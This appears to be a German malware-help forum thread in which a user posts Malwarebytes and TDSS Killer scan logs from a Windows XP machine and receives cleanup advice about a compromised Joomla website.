(Keine bösartigen Objekte gefunden)
 

Infizierte Registrierungswerte: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Dateiobjekte der Registrierung: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Verzeichnisse: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Dateien: 0

(Keine bösartigen Objekte gefunden)
 

(Ende)

zu 2. Obwohl die Seite Offline ist, erhalte ich von Browser Defender diesen Malware Bericht:

Code:



3  Viren — Bedrohungen gefunden: 1
 

    Name der Bedrohung: Trojan.Maljava!gen23

    Pfad: hxxp://gigabytereminiscencecards.org/analizator_data/ebjjibpfuuh-a.mmmzlwhpx.jar

Edit !!!

Der Fullsacn mit Malwarebytes hat funktioniert:

Code:

Malwarebytes Anti-Malware (Test) 1.65.0.1400

Malwarebytes : Free anti-malware download
 

Datenbank Version: v2012.09.13.02
 

Windows XP Service Pack 3 x86 NTFS

Internet Explorer 8.0.6001.18702

Admin :: BLA-3443EB72419 [Administrator]
 

Schutz: Deaktiviert
 

13.09.2012 09:59:50

mbam-log-2012-09-13 (09-59-50).txt
 

Art des Suchlaufs: Vollständiger Suchlauf (C:\|)

Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM

Deaktivierte Suchlaufeinstellungen: P2P

Durchsuchte Objekte: 247628

Laufzeit: 27 Minute(n), 17 Sekunde(n)
 

Infizierte Speicherprozesse: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Speichermodule: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Registrierungsschlüssel: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Registrierungswerte: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Dateiobjekte der Registrierung: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Verzeichnisse: 0

(Keine bösartigen Objekte gefunden)
 

Infizierte Dateien: 0

(Keine bösartigen Objekte gefunden)
 

(Ende)

Als ich die Confixx Seite meines Hosters besucht habe, kam wieder eine Warnung von Avast. Liegt das Problem bei Firefox ?

nein, denke ich nicht.
du kannst ja mal den firefox öffnen, extras, verlauf, dann von anfang an auswählen und den löschen (passwörter gehen verloren)

Hi Markus,

verstehe ich es richtig, mein System ist nicht befallen.

Es liegt an der Webseite, richtig. habe schon den Hoster angeschrieben.

Hast du vielleicht einen Tipp, worauf ich achten muss. Z.B. wenn ich ein Backup oder Datenbank einspiele etc.

war das nen wortpress system oder irgendwas anderes? dann muss das auf jeden fall mal mit nem update versorgt werden, index.php zb nach schadcode durchsuchen.
unnötige plugins löschen etc.
download tdss killer:
http://www.trojaner-board.de/82358-t...entfernen.html
Klicke auf Change parameters
• Setze die Haken bei Verify driver digital signatures und Detect TDLFS file system
• Klick auf OK und anschließend auf Start scan
- bei funden erst mal immer skip wählen, log posten

Poste dir die Resultate als jpg

1. Es ist ein Joomla Projekt, ich werde vorher alle PWs ändern - warte aktuell auf ein feedback des Hosters

2. Wie prüfe ich die Datenbank ?

nein ich möchte das log.
liegt auf c:
tdss-killer-datum.txt

ich sehe gerade, anstatt skip habe ich die in die Quarantäne gepackt, ist das schlimm ?

Edit: ich habe die ,,Warning" Dateien einzeln mit Avast und Malwarebytes geprüft - keine Infektion

Frage: Kann es sein, dass die seite ratenkauf-24.de immernoch infiziert ist. Obwohl ich bei urlvoid ein refresh gemacht habe, kommt die gleiche bedrohung

Code:

16:57:18.0171 2396  TDSS rootkit removing tool 2.8.8.0 Aug 24 2012 13:27:48

16:57:18.0687 2396  ============================================================

16:57:18.0687 2396  Current date / time: 2012/09/13 16:57:18.0687

16:57:18.0687 2396  SystemInfo:

16:57:18.0687 2396  

16:57:18.0687 2396  OS Version: 5.1.2600 ServicePack: 3.0

16:57:18.0687 2396  Product type: Workstation

16:57:18.0687 2396  ComputerName: BLA-3443EB72419

16:57:18.0687 2396  UserName: Admin

16:57:18.0687 2396  Windows directory: C:\WINDOWS

16:57:18.0687 2396  System windows directory: C:\WINDOWS

16:57:18.0687 2396  Processor architecture: Intel x86

16:57:18.0687 2396  Number of processors: 2

16:57:18.0687 2396  Page size: 0x1000

16:57:18.0687 2396  Boot type: Normal boot

16:57:18.0687 2396  ============================================================

16:57:19.0843 2396  Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000054

16:57:19.0843 2396  ============================================================

16:57:19.0843 2396  \Device\Harddisk0\DR0:

16:57:19.0843 2396  MBR partitions:

16:57:19.0843 2396  \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0xFFFAC05

16:57:19.0859 2396  \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xFFFAC83, BlocksNum 0xD1C5A3D

16:57:19.0859 2396  ============================================================

16:57:19.0890 2396  C: <-> \Device\Harddisk0\DR0\Partition1

16:57:19.0906 2396  D: <-> \Device\Harddisk0\DR0\Partition2

16:57:19.0906 2396  ============================================================

16:57:19.0906 2396  Initialize success

16:57:19.0906 2396  ============================================================

16:57:46.0031 2464  ============================================================

16:57:46.0031 2464  Scan started

16:57:46.0031 2464  Mode: Manual; SigCheck; TDLFS; 

16:57:46.0031 2464  ============================================================

16:57:46.0500 2464  ================ Scan system memory ========================

16:57:46.0500 2464  System memory - ok

16:57:46.0500 2464  ================ Scan services =============================

16:57:46.0609 2464  [ 01E81C84AD1D0ACC61CF3CFD06632210 ] !SASCORE        C:\Programme\SUPERAntiSpyware\SASCORE.EXE

16:57:46.0640 2464  !SASCORE - ok

16:57:46.0750 2464  [ 0352A73CD6B1782EA3ED7A03A8268F55 ] Aavmker4        C:\WINDOWS\system32\drivers\Aavmker4.sys

16:57:46.0796 2464  Aavmker4 - ok

16:57:46.0796 2464  Abiosdsk - ok

16:57:46.0812 2464  abp480n5 - ok

16:57:46.0828 2464  [ AC407F1A62C3A300B4F2B5A9F1D55B2C ] ACPI            C:\WINDOWS\system32\DRIVERS\ACPI.sys

16:57:46.0937 2464  ACPI - ok

16:57:46.0953 2464  [ 9E1CA3160DAFB159CA14F83B1E317F75 ] ACPIEC          C:\WINDOWS\system32\DRIVERS\ACPIEC.sys

16:57:47.0046 2464  ACPIEC - ok

16:57:47.0109 2464  [ B2B64AF436FACCFA854DD397027C5360 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe

16:57:47.0125 2464  AdobeFlashPlayerUpdateSvc - ok

16:57:47.0125 2464  adpu160m - ok

16:57:47.0140 2464  [ 8BED39E3C35D6A489438B8141717A557 ] aec             C:\WINDOWS\system32\drivers\aec.sys

16:57:47.0218 2464  aec - ok

16:57:47.0250 2464  [ 375EB0B97E3950ADEF3633C27A82438B ] AegisP          C:\WINDOWS\system32\DRIVERS\AegisP.sys

16:57:47.0265 2464  AegisP ( UnsignedFile.Multi.Generic ) - warning

16:57:47.0265 2464  AegisP - detected UnsignedFile.Multi.Generic (1)

16:57:47.0312 2464  [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD             C:\WINDOWS\System32\drivers\afd.sys

16:57:47.0328 2464  AFD - ok

16:57:47.0390 2464  [ 4E6294A06BE883C9BD685A8DFD9FCD4E ] AgereSoftModem  C:\WINDOWS\system32\DRIVERS\AGRSM.sys

16:57:47.0500 2464  AgereSoftModem - ok

16:57:47.0500 2464  Aha154x - ok

16:57:47.0500 2464  aic78u2 - ok

16:57:47.0500 2464  aic78xx - ok

16:57:47.0546 2464  [ 738D80CC01D7BC7584BE917B7F544394 ] Alerter         C:\WINDOWS\system32\alrsvc.dll

16:57:47.0640 2464  Alerter - ok

16:57:47.0656 2464  [ 190CD73D4984F94D823F9444980513E5 ] ALG             C:\WINDOWS\System32\alg.exe

16:57:47.0750 2464  ALG - ok

16:57:47.0750 2464  AliIde - ok

16:57:47.0750 2464  amsint - ok

16:57:47.0781 2464  [ D45960BE52C3C610D361977057F98C54 ] AppMgmt         C:\WINDOWS\System32\appmgmts.dll

16:57:47.0875 2464  AppMgmt - ok

16:57:47.0890 2464  [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394         C:\WINDOWS\system32\DRIVERS\arp1394.sys

16:57:47.0968 2464  Arp1394 - ok

16:57:47.0984 2464  asc - ok

16:57:47.0984 2464  asc3350p - ok

16:57:47.0984 2464  asc3550 - ok

16:57:48.0046 2464  [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe

16:57:48.0062 2464  aspnet_state - ok

16:57:48.0093 2464  [ F5DC168BF77572D51BE28BA261B30CB4 ] aswFsBlk        C:\WINDOWS\system32\drivers\aswFsBlk.sys

16:57:48.0093 2464  aswFsBlk - ok

16:57:48.0125 2464  [ 81E695913FEFD4E23360A69C0F151797 ] aswKbd          C:\WINDOWS\system32\drivers\aswKbd.sys

16:57:48.0140 2464  aswKbd - ok

16:57:48.0140 2464  [ 2B9B1DF809E965EF63402CBBA6DB50AE ] aswMon2         C:\WINDOWS\system32\drivers\aswMon2.sys

16:57:48.0156 2464  aswMon2 - ok

16:57:48.0171 2464  [ B7D5E4486BA658ED08624D8084ABB830 ] AswRdr          C:\WINDOWS\system32\drivers\AswRdr.sys

16:57:48.0187 2464  AswRdr - ok

16:57:48.0203 2464  [ 30E45AF8B4D83176CA850FC9699E860B ] aswSnx          C:\WINDOWS\system32\drivers\aswSnx.sys

16:57:48.0250 2464  aswSnx - ok

16:57:48.0281 2464  [ F04BDBCB965C05C51F4A7DE7B62063D6 ] aswSP           C:\WINDOWS\system32\drivers\aswSP.sys

16:57:48.0312 2464  aswSP - ok

16:57:48.0312 2464  [ DFE9152ABFA89BB8CFDC057409B2D4DA ] aswTdi          C:\WINDOWS\system32\drivers\aswTdi.sys

16:57:48.0328 2464  aswTdi - ok

16:57:48.0359 2464  [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac        C:\WINDOWS\system32\DRIVERS\asyncmac.sys

16:57:48.0453 2464  AsyncMac - ok

16:57:48.0453 2464  [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi           C:\WINDOWS\system32\DRIVERS\atapi.sys

16:57:48.0546 2464  atapi - ok

16:57:48.0546 2464  Atdisk - ok

16:57:48.0578 2464  [ 9916C1225104BA14794209CFA8012159 ] Atmarpc         C:\WINDOWS\system32\DRIVERS\atmarpc.sys

16:57:48.0671 2464  Atmarpc - ok

16:57:48.0687 2464  [ 73742099982CF514512E1941F2862C33 ] ATSWPDRV        C:\WINDOWS\system32\DRIVERS\ATSwpDrv.sys

16:57:48.0703 2464  ATSWPDRV - ok

16:57:48.0734 2464  [ 58ED0D5452DF7BE732193E7999C6B9A4 ] AudioSrv        C:\WINDOWS\System32\audiosrv.dll

16:57:48.0828 2464  AudioSrv - ok

16:57:48.0859 2464  [ D9F724AA26C010A217C97606B160ED68 ] audstub         C:\WINDOWS\system32\DRIVERS\audstub.sys

16:57:48.0937 2464  audstub - ok

16:57:48.0984 2464  [ 04AC21E821F259845BD7367CEE057290 ] avast! Antivirus C:\Programme\AVAST Software\Avast\AvastSvc.exe

16:57:49.0000 2464  avast! Antivirus - ok

16:57:49.0000 2464  avast! Firewall - ok

16:57:49.0046 2464  [ F96038AA1EC4013A93D2420FC689D1E9 ] b57w2k          C:\WINDOWS\system32\DRIVERS\b57xp32.sys

16:57:49.0078 2464  b57w2k - ok

16:57:49.0109 2464  [ 3D87B0484BE1093C6614062701F375C5 ] BASFND          C:\Programme\Broadcom\BACS\BASFND.sys

16:57:49.0109 2464  BASFND ( UnsignedFile.Multi.Generic ) - warning

16:57:49.0109 2464  BASFND - detected UnsignedFile.Multi.Generic (1)

16:57:49.0140 2464  [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep            C:\WINDOWS\system32\drivers\Beep.sys

16:57:49.0234 2464  Beep - ok

16:57:49.0265 2464  [ D6F603772A789BB3228F310D650B8BD1 ] BITS            C:\WINDOWS\system32\qmgr.dll

16:57:49.0375 2464  BITS - ok

16:57:49.0390 2464  [ A357E499771E5DB0D29051FABF2BB866 ] BPowMon         C:\Programme\Broadcom\BACS\BPowMon.exe

16:57:49.0421 2464  BPowMon ( UnsignedFile.Multi.Generic ) - warning

16:57:49.0421 2464  BPowMon - detected UnsignedFile.Multi.Generic (1)

16:57:49.0468 2464  [ B71549F23736ADF83A571061C47777FD ] Browser         C:\WINDOWS\System32\browser.dll

16:57:49.0500 2464  Browser - ok

16:57:49.0546 2464  [ D84166D41A05F66D9084039427E5025B ] BTKRNL          C:\WINDOWS\system32\DRIVERS\btkrnl.sys

16:57:49.0625 2464  BTKRNL - ok

16:57:49.0703 2464  [ B1E5C0065102FCB92E1F0231AF0AE7C3 ] btwdins         C:\Programme\Lenovo\Bluetooth Software\bin\btwdins.exe

16:57:49.0734 2464  btwdins ( UnsignedFile.Multi.Generic ) - warning

16:57:49.0734 2464  btwdins - detected UnsignedFile.Multi.Generic (1)

16:57:49.0734 2464  [ A01FD9851406DE0870C23759E2F7B6EA ] BTWUSB          C:\WINDOWS\system32\Drivers\btwusb.sys

16:57:49.0765 2464  BTWUSB - ok

16:57:49.0828 2464  [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k         C:\WINDOWS\system32\drivers\cbidf2k.sys

16:57:49.0921 2464  cbidf2k - ok

16:57:49.0937 2464  [ 0BE5AEF125BE881C4F854C554F2B025C ] CCDECODE        C:\WINDOWS\system32\DRIVERS\CCDECODE.sys

16:57:50.0046 2464  CCDECODE - ok

16:57:50.0046 2464  cd20xrnt - ok

16:57:50.0062 2464  [ C1B486A7658353D33A10CC15211A873B ] Cdaudio         C:\WINDOWS\system32\drivers\Cdaudio.sys

16:57:50.0140 2464  Cdaudio - ok

16:57:50.0156 2464  [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs            C:\WINDOWS\system32\drivers\Cdfs.sys

16:57:50.0250 2464  Cdfs - ok

16:57:50.0265 2464  [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom           C:\WINDOWS\system32\DRIVERS\cdrom.sys

16:57:50.0359 2464  Cdrom - ok

16:57:50.0359 2464  Changer - ok

16:57:50.0390 2464  [ 28E3040D1F1CA2008CD6B29DFEBC9A5E ] CiSvc           C:\WINDOWS\system32\cisvc.exe

16:57:50.0484 2464  CiSvc - ok

16:57:50.0500 2464  [ 778A30ED3C134EB7E406AFC407E9997D ] ClipSrv         C:\WINDOWS\system32\clipsrv.exe

16:57:50.0578 2464  ClipSrv - ok

16:57:50.0609 2464  [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

16:57:50.0625 2464  clr_optimization_v2.0.50727_32 - ok

16:57:50.0640 2464  [ 0F6C187D38D98F8DF904589A5F94D411 ] CmBatt          C:\WINDOWS\system32\DRIVERS\CmBatt.sys

16:57:50.0734 2464  CmBatt - ok

16:57:50.0734 2464  CmdIde - ok

16:57:50.0750 2464  [ 6E4C9F21F0FAE8940661144F41B13203 ] Compbatt        C:\WINDOWS\system32\DRIVERS\compbatt.sys

16:57:50.0828 2464  Compbatt - ok

16:57:50.0828 2464  COMSysApp - ok

16:57:50.0843 2464  Cpqarray - ok

16:57:50.0875 2464  [ 611F824E5C703A5A899F84C5F1699E4D ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll

16:57:50.0968 2464  CryptSvc - ok

16:57:50.0968 2464  dac2w2k - ok

16:57:50.0984 2464  dac960nt - ok

16:57:51.0015 2464  [ 3127AFBF2C1ED0AB14A1BBB7AAECB85B ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll

16:57:51.0109 2464  DcomLaunch - ok

16:57:51.0125 2464  [ C29A1C9B75BA38FA37F8C44405DEC360 ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll

16:57:51.0218 2464  Dhcp - ok

16:57:51.0250 2464  [ 044452051F3E02E7963599FC8F4F3E25 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys

16:57:51.0328 2464  Disk - ok

16:57:51.0328 2464  dmadmin - ok

16:57:51.0375 2464  [ 0DCFC8395A99FECBB1EF771CEC7FE4EA ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys

16:57:51.0515 2464  dmboot - ok

16:57:51.0515 2464  [ 53720AB12B48719D00E327DA470A619A ] dmio            C:\WINDOWS\system32\drivers\dmio.sys

16:57:51.0625 2464  dmio - ok

16:57:51.0625 2464  [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload          C:\WINDOWS\system32\drivers\dmload.sys

16:57:51.0718 2464  dmload - ok

16:57:51.0765 2464  [ 25C83FFBBA13B554EB6D59A9B2E2EE78 ] dmserver        C:\WINDOWS\System32\dmserver.dll

16:57:51.0843 2464  dmserver - ok

16:57:51.0859 2464  [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys

16:57:51.0953 2464  DMusic - ok

16:57:51.0984 2464  [ 407F3227AC618FD1CA54B335B083DE07 ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll

16:57:52.0046 2464  Dnscache - ok

16:57:52.0062 2464  [ 676E36C4FF5BCEA1900F44182B9723E6 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll

16:57:52.0171 2464  Dot3svc - ok

16:57:52.0171 2464  dpti2o - ok

16:57:52.0171 2464  [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys

16:57:52.0265 2464  drmkaud - ok

16:57:52.0265 2464  [ 4E4F2FDDAB0A0736D7671134DCCE91FB ] EapHost         C:\WINDOWS\System32\eapsvc.dll

16:57:52.0375 2464  EapHost - ok

16:57:52.0406 2464  [ 877C18558D70587AA7823A1A308AC96B ] ERSvc           C:\WINDOWS\System32\ersvc.dll

16:57:52.0484 2464  ERSvc - ok

16:57:52.0531 2464  [ A3EDBE9053889FB24AB22492472B39DC ] Eventlog        C:\WINDOWS\system32\services.exe

16:57:52.0578 2464  Eventlog - ok

16:57:52.0593 2464  [ AF4F6B5739D18CA7972AB53E091CBC74 ] EventSystem     C:\WINDOWS\system32\es.dll

16:57:52.0609 2464  EventSystem - ok

16:57:52.0656 2464  [ 4432179A475DEEB0EB0F1BEE11831A89 ] EvtEng          C:\Programme\Intel\Wireless\Bin\EvtEng.exe

16:57:52.0687 2464  EvtEng ( UnsignedFile.Multi.Generic ) - warning

16:57:52.0687 2464  EvtEng - detected UnsignedFile.Multi.Generic (1)

16:57:52.0750 2464  [ A52794C010C6DF5B4BC70C4AB5E04088 ] ewusbnet        C:\WINDOWS\system32\DRIVERS\ewusbnet.sys

16:57:52.0921 2464  ewusbnet - ok

16:57:52.0953 2464  [ 57C171EA22F0A7F068FCB0CAEDD1E8E7 ] ew_hwusbdev     C:\WINDOWS\system32\DRIVERS\ew_hwusbdev.sys

16:57:53.0000 2464  ew_hwusbdev - ok

16:57:53.0031 2464  [ 38D332A6D56AF32635675F132548343E ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys

16:57:53.0125 2464  Fastfat - ok

16:57:53.0171 2464  [ 2DB7D303C36DDD055215052F118E8E75 ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll

16:57:53.0203 2464  FastUserSwitchingCompatibility - ok

16:57:53.0218 2464  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc             C:\WINDOWS\system32\drivers\Fdc.sys

16:57:53.0296 2464  Fdc - ok

16:57:53.0328 2464  [ 1DDBFC6C4D837A7D82FD0DF56A54D9F6 ] FingerprintServer C:\WINDOWS\system32\FpLogonServ.exe

16:57:53.0343 2464  FingerprintServer ( UnsignedFile.Multi.Generic ) - warning

16:57:53.0343 2464  FingerprintServer - detected UnsignedFile.Multi.Generic (1)

16:57:53.0375 2464  [ B0678A548587C5F1967B0D70BACAD6C1 ] Fips            C:\WINDOWS\system32\drivers\Fips.sys

16:57:53.0468 2464  Fips - ok

16:57:53.0468 2464  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk        C:\WINDOWS\system32\drivers\Flpydisk.sys

16:57:53.0546 2464  Flpydisk - ok

16:57:53.0593 2464  [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys

16:57:53.0687 2464  FltMgr - ok

16:57:53.0734 2464  [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe

16:57:53.0750 2464  FontCache3.0.0.0 - ok

16:57:53.0750 2464  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys

16:57:53.0843 2464  Fs_Rec - ok

16:57:53.0859 2464  [ 8F1955CE42E1484714B542F341647778 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys

16:57:53.0953 2464  Ftdisk - ok

16:57:53.0968 2464  [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys

16:57:54.0046 2464  Gpc - ok

16:57:54.0062 2464  [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys

16:57:54.0156 2464  HDAudBus - ok

16:57:54.0187 2464  [ CB66BF85BF599BEFD6C6A57C2E20357F ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll

16:57:54.0281 2464  helpsvc - ok

16:57:54.0312 2464  [ B35DA85E60C0103F2E4104532DA2F12B ] HidServ         C:\WINDOWS\System32\hidserv.dll

16:57:54.0390 2464  HidServ - ok

16:57:54.0421 2464  [ CCF82C5EC8A7326C3066DE870C06DAF1 ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys

16:57:54.0515 2464  hidusb - ok

16:57:54.0546 2464  [ ED29F14101523A6E0E808107405D452C ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll

16:57:54.0625 2464  hkmsvc - ok

16:57:54.0625 2464  hpn - ok

16:57:54.0671 2464  [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys

16:57:54.0703 2464  HTTP - ok

16:57:54.0734 2464  [ 9E4ADB854CEBCFB81A4B36718FEECD16 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll

16:57:54.0828 2464  HTTPFilter - ok

16:57:54.0875 2464  [ BED3A9F86A637CC6C2C5296CD82423D8 ] huawei_enumerator C:\WINDOWS\system32\DRIVERS\ew_jubusenum.sys

16:57:54.0921 2464  huawei_enumerator - ok

16:57:54.0953 2464  [ 1F40368DC40B17DE3FA0FBE8A9D82F9E ] hwdatacard      C:\WINDOWS\system32\DRIVERS\ewusbmdm.sys

16:57:55.0000 2464  hwdatacard - ok

16:57:55.0046 2464  HWDeviceService.exe - ok

16:57:55.0062 2464  i2omgmt - ok

16:57:55.0062 2464  i2omp - ok

16:57:55.0093 2464  [ E283B97CFBEB86C1D86BAED5F7846A92 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys

16:57:55.0171 2464  i8042prt - ok

16:57:55.0343 2464  [ 28423512370705AEDA6A652FEDB25468 ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys

16:57:55.0640 2464  ialm - ok

16:57:55.0703 2464  [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe

16:57:55.0765 2464  idsvc - ok

16:57:55.0781 2464  [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys

16:57:55.0859 2464  Imapi - ok

16:57:55.0890 2464  [ D4B413AA210C21E46AEDD2BA5B68D38E ] ImapiService    C:\WINDOWS\system32\imapi.exe

16:57:55.0968 2464  ImapiService - ok

16:57:55.0984 2464  ini910u - ok

16:57:56.0125 2464  [ B29781B9A90CD55FC5D859C0B1C243BC ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys

16:57:56.0406 2464  IntcAzAudAddService - ok

16:57:56.0406 2464  IntelIde - ok

16:57:56.0453 2464  [ 4C7D2750158ED6E7AD642D97BFFAE351 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys

16:57:56.0531 2464  intelppm - ok

16:57:56.0546 2464  [ 3BB22519A194418D5FEC05D800A19AD0 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys

16:57:56.0640 2464  Ip6Fw - ok

16:57:56.0656 2464  [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys

16:57:56.0750 2464  IpFilterDriver - ok

16:57:56.0765 2464  [ B87AB476DCF76E72010632B5550955F5 ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys

16:57:56.0843 2464  IpInIp - ok

16:57:56.0859 2464  [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys

16:57:56.0937 2464  IpNat - ok

16:57:56.0968 2464  [ 23C74D75E36E7158768DD63D92789A91 ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys

16:57:57.0062 2464  IPSec - ok

16:57:57.0078 2464  [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys

16:57:57.0171 2464  IRENUM - ok

16:57:57.0187 2464  [ 6DFB88F64135C525433E87648BDA30DE ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys

16:57:57.0265 2464  isapnp - ok

16:57:57.0343 2464  [ A195C4FC49492928E8296B8C4AB00517 ] ISWKL           C:\Programme\CheckPoint\ZAForceField\ISWKL.sys

16:57:57.0359 2464  ISWKL - ok

16:57:57.0390 2464  [ E78EACA70B4E0C260E4B32972B7086AC ] IswSvc          C:\Programme\CheckPoint\ZAForceField\IswSvc.exe

16:57:57.0421 2464  IswSvc - ok

16:57:57.0437 2464  [ 1704D8C4C8807B889E43C649B478A452 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys

16:57:57.0515 2464  Kbdclass - ok

16:57:57.0531 2464  [ B6D6C117D771C98130497265F26D1882 ] kbdhid          C:\WINDOWS\system32\DRIVERS\kbdhid.sys

16:57:57.0625 2464  kbdhid - ok

16:57:57.0640 2464  [ 692BCF44383D056AED41B045A323D378 ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys

16:57:57.0718 2464  kmixer - ok

16:57:57.0734 2464  [ B467646C54CC746128904E1654C750C1 ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys

16:57:57.0781 2464  KSecDD - ok

16:57:57.0812 2464  [ 2BBDCB79900990F0716DFCB714E72DE7 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll

16:57:57.0843 2464  lanmanserver - ok

16:57:57.0875 2464  [ 1869B14B06B44B44AF70548E1EA3303F ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll

16:57:57.0906 2464  lanmanworkstation - ok

16:57:57.0906 2464  lbrtfdc - ok

16:57:57.0937 2464  [ 3C3F7F424E324C6971632C5DE5FF458F ] lenovo.smi      C:\WINDOWS\system32\DRIVERS\smiif32.sys

16:57:57.0953 2464  lenovo.smi - ok

16:57:57.0984 2464  [ 636714B7D43C8D0C80449123FD266920 ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll

16:57:58.0078 2464  LmHosts - ok

16:57:58.0078 2464  massfilter - ok

16:57:58.0125 2464  [ 65E794E86468B61F2BC79ABC48BC4433 ] MBAMProtector   C:\WINDOWS\system32\drivers\mbam.sys

16:57:58.0140 2464  MBAMProtector - ok

16:57:58.0187 2464  [ 0DCF16B1449811EFA47AB52CAC84093C ] MBAMScheduler   C:\Programme\Malwarebytes' Anti-Malware\mbamscheduler.exe

16:57:58.0203 2464  MBAMScheduler - ok

16:57:58.0250 2464  [ 9EAABA4D601004BEA4DAA6E146E19A96 ] MBAMService     C:\Programme\Malwarebytes' Anti-Malware\mbamservice.exe

16:57:58.0296 2464  MBAMService - ok

16:57:58.0312 2464  [ B7550A7107281D170CE85524B1488C98 ] Messenger       C:\WINDOWS\System32\msgsvc.dll

16:57:58.0390 2464  Messenger - ok

16:57:58.0421 2464  [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys

16:57:58.0500 2464  mnmdd - ok

16:57:58.0546 2464  [ C2F1D365FD96791B037EE504868065D3 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe

16:57:58.0640 2464  mnmsrvc - ok

16:57:58.0687 2464  [ 38106C7BD34EAE89D2769AC0BA2E846B ] Mobile Partner. RunOuc C:\Programme\Mobile Partner\UpdateDog\ouc.exe

16:57:58.0687 2464  Mobile Partner. RunOuc ( UnsignedFile.Multi.Generic ) - warning

16:57:58.0687 2464  Mobile Partner. RunOuc - detected UnsignedFile.Multi.Generic (1)

16:57:58.0718 2464  [ 6FB74EBD4EC57A6F1781DE3852CC3362 ] Modem           C:\WINDOWS\system32\drivers\Modem.sys

16:57:58.0812 2464  Modem - ok

16:57:58.0828 2464  [ B24CE8005DEAB254C0251E15CB71D802 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys

